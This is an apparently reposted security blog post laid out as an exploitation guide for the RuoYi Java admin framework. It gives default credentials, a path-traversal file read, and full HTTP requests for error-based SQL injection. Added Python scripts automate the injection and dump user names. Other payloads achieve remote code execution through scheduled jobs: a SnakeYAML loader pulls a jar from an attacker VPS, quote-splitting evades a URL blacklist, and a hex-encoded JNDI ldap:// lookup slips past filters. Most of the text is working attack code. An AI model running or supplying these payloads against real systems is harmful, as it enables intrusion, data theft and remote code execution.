1. RuoYi default credentials
admin/admin123
ruoyi/123456
2. Shiro deserialization on the front end
The bundled Shiro version is old and in practice basically not exploitable; where it does apply, exploitation is just a matter of running a Shiro deserialization tool, so it is not described further here.
3. Arbitrary file read, RuoYi < 4.5.1
The resource download handler joins the resource parameter onto the local profile directory without rejecting ../ sequences, so the traversal walks out of that directory and returns any file the service account can open:
GET /common/download/resource?resource=/profile/../../../../../../../(unknown)
4. SQL injection
4-1. /system/role/list
The injection point is params[dataScope]. The data-scope filter is interpolated into the mapper SQL as a raw fragment, and a user-supplied params[dataScope] value is not discarded before that happens, so an error-based payload with extractvalue() leaks query results through MySQL's XPATH error message. The endpoint needs a logged-in session.
POST form:
POST /system/role/list HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 179
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/system/role
Cookie: UMK8_2132_ulastactivity=fdf6lh5P4KaIR7rPwncVmGmx5z2ymLLNz3o33msgkFJlQ1SdH%2FhR; UMK8_2132_lastcheckfeed=1%7C1637287051; UMK8_2132_nofavfid=1; JSESSIONID=d9eca4a4-7fcd-41ba-9888-75e7c73dc9bf
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
GET form:
GET /system/role/list?pageSize=10&pageNum=1&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params%5BbeginTime%5D=&params%5BendTime%5D=&params%5BdataScope%5D=and+extractvalue(1,concat(0x7e,(select+database()),0x7e)) HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/system/role
Cookie: UMK8_2132_ulastactivity=fdf6lh5P4KaIR7rPwncVmGmx5z2ymLLNz3o33msgkFJlQ1SdH%2FhR; UMK8_2132_lastcheckfeed=1%7C1637287051; UMK8_2132_nofavfid=1; JSESSIONID=d9eca4a4-7fcd-41ba-9888-75e7c73dc9bf
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
4-2. /system/dept/list
Same parameter and same payload; only the endpoint differs. The request must carry a logged-in session cookie, as in 4-1.
POST /system/dept/list HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
Connection: keep-alive
Sec-Fetch-Dest: document
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Cookie: JSESSIONID=d9eca4a4-7fcd-41ba-9888-75e7c73dc9bf
sec-ch-ua-mobile: ?0
Sec-Fetch-User: ?1
sec-ch-ua-platform: "Windows"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br

params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
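The two requests in 4-1 and 4-2 differ only in the endpoint, so a small probe covers both. The script below is an added example, not code from the original post: it builds the same extractvalue() payload, submits it with an authenticated JSESSIONID, and pulls the leaked value out of MySQL's XPATH error text. The target URL, the cookie value and the subqueries are assumptions to adapt; the sample response body is constructed for the offline demo, not a real capture.

```python
"""Error-based probe for the RuoYi params[dataScope] SQL injection.

Added example, not code from the original post. Target URL, cookie and
subqueries are assumptions; SAMPLE_RESPONSE is constructed, not captured.
"""
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Iterator, Optional

ENDPOINTS = ("/system/role/list", "/system/dept/list")

# MySQL echoes the bad XPath expression back verbatim, ~ markers included.
LEAK_RE = re.compile(r"XPATH syntax error: '~(.*?)~'")


def build_payload(subquery: str) -> str:
    """The dataScope fragment: the subquery result becomes the XPath string."""
    return f"and extractvalue(1,concat(0x7e,({subquery}),0x7e))"


def build_form(subquery: str) -> str:
    """URL-encoded body matching the post's POST request field for field."""
    fields = [
        ("pageSize", ""), ("pageNum", ""), ("orderByColumn", ""), ("isAsc", ""),
        ("roleName", ""), ("roleKey", ""), ("status", ""),
        ("params[beginTime]", ""), ("params[endTime]", ""),
        ("params[dataScope]", build_payload(subquery)),
    ]
    return urllib.parse.urlencode(fields)


def parse_leak(body: str) -> Optional[str]:
    """Value between the ~ markers, or None when no error was provoked."""
    m = LEAK_RE.search(body)
    return m.group(1) if m else None


def paged_subqueries(expr: str, length: int, page: int = 31) -> Iterator[str]:
    """extractvalue() only echoes 32 characters, one of them the leading ~,
    so longer results are read 31 characters at a time with substring()."""
    for start in range(1, length + 1, page):
        yield f"select substring(({expr}),{start},{page})"


def send(base_url: str, endpoint: str, jsessionid: str, subquery: str) -> str:
    """POST the payload with the session cookie and return the response body."""
    req = urllib.request.Request(
        base_url.rstrip("/") + endpoint,
        data=build_form(subquery).encode(),
        headers={
            "Content-Type": "application/x-www-form-urlencoded",
            "X-Requested-With": "XMLHttpRequest",
            "Cookie": f"JSESSIONID={jsessionid}",  # assumed: a logged-in session
        },
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode(errors="replace")
    except urllib.error.HTTPError as exc:  # an error page still carries the message
        return exc.read().decode(errors="replace")


# Constructed RuoYi-style JSON error body for the offline demo (not a real capture).
SAMPLE_RESPONSE = (
    '{"msg":"### Error querying database.  Cause: java.sql.SQLException: '
    "XPATH syntax error: '~ry~'\\n### The error may exist in the mapper\",\"code\":500}"
)

if __name__ == "__main__":
    print(build_form("select database()"))
    print(parse_leak(SAMPLE_RESPONSE))
    # Live use against an assumed host and session:
    # for q in paged_subqueries("select group_concat(user_name) from sys_user", 93):
    #     print(parse_leak(send("http://127.0.0.1", ENDPOINTS[0], "d9eca4a4-...", q)))
```

The paging helper matters in practice: extractvalue() truncates at 32 characters, so anything longer than a database name has to be read in substring() slices.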
5. Scheduled jobs
5-1. Unrestricted job execution
The job module executes whatever "invoke target" string a job carries, in the form bean.method(args) or fully.qualified.Class.method(args). Host the exploit jar on a VPS, then create a new job with the SnakeYAML payload as the invoke target and a short cron expression. Yaml.load() instantiates the tagged classes: a URLClassLoader pointed at the jar is handed to ScriptEngineManager, whose service-loader scan instantiates the ScriptEngineFactory registered in the jar, which runs the attacker's code.
Invoke target:
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://VPS-ADDRESS/yaml-payload.jar"]]]]')
Cron expression:
0/10 * * * * ?
5-2. Blacklist on the invoke-target string
Later versions reject a new or edited job whose invoke target contains a remote URL:
ldap:// calls in job invoke targets are blocked
http(s):// calls in job invoke targets are blocked
rmi:// calls in job invoke targets are blocked
The check is a plain substring match on the raw string, but the argument parser that extracts a string argument removes every single quote from it before the method is called. Splitting the scheme with quotes therefore passes the filter and is reassembled into http:// at execution time:
Invoke target:
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["h't't'p'://VPS-ADDRESS/yaml-payload.jar"]]]]')
Cron expression:
0/10 * * * * ?
5-3. Whitelist on the callable class
Newer versions only allow invoke targets that resolve into the project's own package, so external classes such as SnakeYAML can no longer be named directly. The workaround is the whitelisted bean method genTableServiceImpl.createTable, which executes the SQL string it is given: use it to rewrite invoke_target of an existing job to a JNDI payload. The blacklist is only enforced when a job is created or edited through the controller, not when a stored invoke target is executed, so a value written straight into sys_job is never checked.
Exploitation:
Create a new job that only proves the write works:
Invoke target:
genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 'NILF' WHERE job_id = 1;')
Cron expression:
0/10 * * * * ?
If the "invoke target string" of job_id 1 reads NILF after the job has fired, the vulnerability is present and exploitation can continue. The real attack payload is:
genTableServiceImpl.createTable("UPDATE sys_job SET invoke_target = \"javax.naming.InitialContext.lookup('ldap://ip:port/Deserialization/URLDNS/ekwzmxtyim.dgrh3.cn')\" WHERE job_id = 1;")
JNDI is usually blacklisted as well, though, so the value (javax.naming.InitialContext.lookup('ldap://ip:port/Deserialization/URLDNS/ekwzmxtyim.dgrh3.cn')) is hex-encoded as a MySQL 0x... literal to get past the blacklist: the filter only sees hex digits, and MySQL decodes the literal back into the string when it stores the column. The final payload is:
genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x6a617661782e6e616d696e672e496e697469616c436f6e746578742e6c6f6f6b757028276c6461703a2f2f3139322e3136382e34342e38343a313338392f446573657269616c697a6174696f6e2f55524c444e532f656b777a6d787479696d2e64677268332e636e2729 WHERE job_id = 1;')
The rewritten job 1 still has to fire, on its own schedule or by running it once, before the lookup reaches the listener at ip:port.
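Sections 5-1 to 5-3 all turn on how the invoke-target string is checked versus how it is later parsed and stored. The script below is an added example, not code from the post or from the RuoYi project: it re-implements the blacklist, the package whitelist and the quote-stripping argument parser in simplified Python (an assumption kept close to the behaviour the post relies on) so the two bypasses can be checked offline. It also reproduces the post's final payload from the LDAP URL, so the hex literal in the post can be verified. Host names are placeholders.

```python
"""Model of the RuoYi job invoke-target checks and the 5-2 / 5-3 bypasses.

Added example, not RuoYi code: BLACKLIST, passes_whitelist() and
legacy_string_args() are a simplified re-implementation (assumption) of
the Java behaviour the post describes. "VPS" is a placeholder host.
"""
import re

# Terms rejected on job create/edit (model of the blacklist, lower-cased).
BLACKLIST = ("rmi://", "ldap://", "ldaps://", "http://", "https://",
             "javax.naming.initialcontext")
# Package a fully qualified class target must belong to (model of the whitelist).
WHITELIST_PKG = "com.ruoyi"

# Hex literal exactly as it appears in the post's final payload.
PAGE_HEX = ("6a617661782e6e616d696e672e496e697469616c436f6e746578742e6c6f6f6b75702827"
            "6c6461703a2f2f3139322e3136382e34342e38343a313338392f"
            "446573657269616c697a6174696f6e2f55524c444e532f"
            "656b777a6d787479696d2e64677268332e636e2729")
JNDI_URL = "ldap://192.168.44.84:1389/Deserialization/URLDNS/ekwzmxtyim.dgrh3.cn"


def yaml_target(scheme: str, host: str = "VPS") -> str:
    """The 5-1 SnakeYAML invoke target with the URL scheme left pluggable."""
    return ("org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager "
            "[!!java.net.URLClassLoader [[!!java.net.URL "
            f'["{scheme}://{host}/yaml-payload.jar"]]]]\')')


def quote_split(word: str) -> str:
    """The h't't'p' obfuscation from 5-2: a single quote after every character."""
    return "".join(ch + "'" for ch in word)


def passes_blacklist(invoke_target: str) -> bool:
    """Case-insensitive substring check on the raw string, nothing more."""
    low = invoke_target.lower()
    return not any(term in low for term in BLACKLIST)


def passes_whitelist(invoke_target: str) -> bool:
    """A fully qualified class (more than one dot before '(') must live in the
    project package; a bare bean name is resolved from the Spring context and
    is assumed here to be a project-internal bean (as genTableServiceImpl is)."""
    prefix = invoke_target.split("(", 1)[0]
    if prefix.count(".") > 1:
        return WHITELIST_PKG in invoke_target.lower()
    return True


def legacy_string_args(invoke_target: str):
    """Older argument parser: a string argument is recognised by containing a
    single quote, and *all* single quotes are then deleted from it. That is
    what turns h't't'p' back into http after the blacklist has been passed."""
    inner = invoke_target[invoke_target.index("(") + 1: invoke_target.rindex(")")]
    return [a.strip().replace("'", "") for a in inner.split(",") if "'" in a]


def hex_literal(s: str) -> str:
    """MySQL 0x... literal; the server stores the decoded string."""
    return "0x" + s.encode().hex()


def build_direct_payload(jndi_url: str, job_id: int = 1) -> str:
    """First 5-3 attempt: the JNDI string sits in clear text inside the UPDATE."""
    lookup = f"javax.naming.InitialContext.lookup('{jndi_url}')"
    return (f'genTableServiceImpl.createTable("UPDATE sys_job SET invoke_target = '
            f'\\"{lookup}\\" WHERE job_id = {job_id};")')


def build_hex_payload(jndi_url: str, job_id: int = 1) -> str:
    """Final 5-3 payload: same UPDATE, JNDI string carried as a hex literal."""
    lookup = f"javax.naming.InitialContext.lookup('{jndi_url}')"
    sql = f"UPDATE sys_job SET invoke_target = {hex_literal(lookup)} WHERE job_id = {job_id};"
    return f"genTableServiceImpl.createTable('{sql}')"


def stored_sql(payload: str) -> str:
    """What the database actually executes: each 0x... literal decoded to text."""
    return re.sub(r"0x([0-9a-fA-F]+)",
                  lambda m: bytes.fromhex(m.group(1)).decode(), payload)


if __name__ == "__main__":
    plain, split = yaml_target("http"), yaml_target(quote_split("http"))
    print("5-1 target hits blacklist:", not passes_blacklist(plain))
    print("5-2 split target passes:  ", passes_blacklist(split))
    print("5-2 argument after parse: ", legacy_string_args(split)[0])
    print("5-3 yaml passes whitelist:", passes_whitelist(plain))
    direct, hexed = build_direct_payload(JNDI_URL), build_hex_payload(JNDI_URL)
    print("5-3 direct hits blacklist:", not passes_blacklist(direct))
    print("5-3 hex passes both:      ", passes_blacklist(hexed) and passes_whitelist(hexed))
    print("5-3 matches post's hex:   ", PAGE_HEX in hexed)
    print("5-3 SQL as stored:        ", stored_sql(hexed))
```

The design point the model makes visible: each filter inspects the string at submission time, while the quote stripping happens at execution time and the hex decoding happens inside MySQL, so neither filter ever sees the value that is finally used.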
Source: https://www.cnblogs.com/nilf/p/18280005